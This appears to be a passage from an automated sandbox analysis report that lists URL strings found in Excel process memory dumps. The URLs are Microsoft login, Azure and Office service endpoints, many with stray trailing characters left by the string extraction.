      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeB
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCx
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeGt
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeLD
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeLx
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMy
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeNJ
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN~
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizePF
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizePzf
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeRD
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeRx
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeVtd
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizebE
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizebyp
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecJ
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom7KT
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizec~s
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeetu
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefut
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizegzw
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeizerJ
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel~b
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemK
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizepD
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizepxF
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeqyA
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesKh
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizete
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeuuE
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizevF
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeyV
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizez
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/TOa
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://management.azure.com
      Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://management.azure.com/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/q
      Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://messaging.office.com/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyt
